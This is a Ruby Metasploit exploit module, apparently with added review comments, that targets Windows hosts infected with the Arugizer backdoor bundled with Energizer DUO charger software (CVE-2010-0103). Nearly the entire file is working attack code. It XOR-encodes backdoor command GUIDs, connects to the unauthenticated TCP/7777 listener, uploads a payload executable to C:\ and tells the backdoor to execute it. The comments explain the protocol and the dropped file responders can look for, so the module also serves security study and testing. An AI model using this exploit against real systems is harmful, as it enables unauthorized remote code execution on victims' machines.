Energizer DUO Trojan Code Execution



##

# $Id: energizer_duo_payload.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

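class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::EXE

    # Every byte sent to the backdoor is XOR'd with this one constant (see
    # trojan_encode). That is obfuscation, not encryption: anyone holding a
    # capture of the session can recover the cleartext GUIDs, file name and
    # file contents by applying the same single-byte key.
    XOR_KEY = 0xE5

    # Command GUIDs understood by the Arugizer backdoor. This module only
    # uses :write, :exec and :nop; the others are kept for reference.
    COMMAND_IDS = {
        :exec    => "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}",
        :dir     => "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}",
        :write   => "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}",
        :read    => "{F6C43E1A-1551-4000-A483-C361969AEC41}",
        :nop     => "{783EACBF-EF8B-498e-A059-F0B5BD12641E}",
        :find    => "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}",
        :yes     => "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}",
        :runonce => "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}",
        :delete  => "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
    }.freeze

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Energizer DUO Trojan Code Execution',
            'Description'    => %q{
                    This module will execute an arbitrary payload against
                any system infected with the Arugizer trojan horse. This
                backdoor was shipped with the software package accompanying
                the Energizer Duo USB battery charger.
            },
            'Author'         => [ 'hdm' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 10389 $',
            'References'     =>
                [
                    ['CVE', '2010-0103'],
                    ['OSVDB', '62782'],
                    ['US-CERT-VU', '154421']
                ],
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 05 2010'
            ))


        # The backdoor's listener defaults to TCP/7777; there is no
        # authentication on that port, which is the whole vulnerability.
        register_options(
            [
                Opt::RPORT(7777),
            ], self.class)
    end

    # XOR every byte of +str+ with XOR_KEY and return the result. The
    # transform is its own inverse, so it also decodes captured traffic.
    def trojan_encode(str)
        str.unpack("C*").map { |c| c ^ XOR_KEY }.pack("C*")
    end

    # Build the encoded command header for +cmd+, a key of COMMAND_IDS:
    # a 32-bit little-endian length covering the GUID plus its NUL
    # terminator, followed by the GUID and the NUL.
    #
    # Raises ArgumentError for an unknown command. The previous version
    # silently emitted a header with an empty GUID instead, which the
    # backdoor would not recognise.
    def trojan_command(cmd)
        cid = COMMAND_IDS[cmd]
        raise ArgumentError, "unknown trojan command #{cmd.inspect}" unless cid

        trojan_encode([cid.length + 1].pack("V") + cid + "\x00")
    end

    # Send one string field to the backdoor: a 32-bit little-endian count
    # followed by the bytes, each part XOR-encoded and written separately
    # exactly as the original wire sequence did.
    #
    # NOTE(review): the count is String#length. That equals the byte count
    # for what exploit() passes today (an ASCII-only path and the raw
    # payload blob); use bytesize if non-ASCII data is ever sent here.
    def put_trojan_string(str)
        sock.put(trojan_encode([str.length].pack("V")))
        sock.put(trojan_encode(str))
    end

    # Upload the payload executable as C:\<random>.exe over one connection,
    # then ask the backdoor to run it over a second connection.
    #
    # No cleanup is attempted: the dropped file stays on disk after the
    # payload runs, so the random name printed below is the artifact an
    # incident responder should look for on the infected host.
    def exploit

        # Both strings carry their own NUL terminator, which the length
        # prefix sent by put_trojan_string must include.
        nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
        exe = generate_payload_exe + "\x00"


        print_status("Trying to upload #{nam}...")
        connect

        # Write file request: command, destination path, file contents
        sock.put(trojan_command(:write))
        put_trojan_string(nam)
        put_trojan_string(exe)

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect

        #
        # Execute the payload
        #

        print_status("Trying to execute #{nam}...")

        connect

        # Execute file request: command, path of the file to run
        sock.put(trojan_command(:exec))
        put_trojan_string(nam)

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect
    end
end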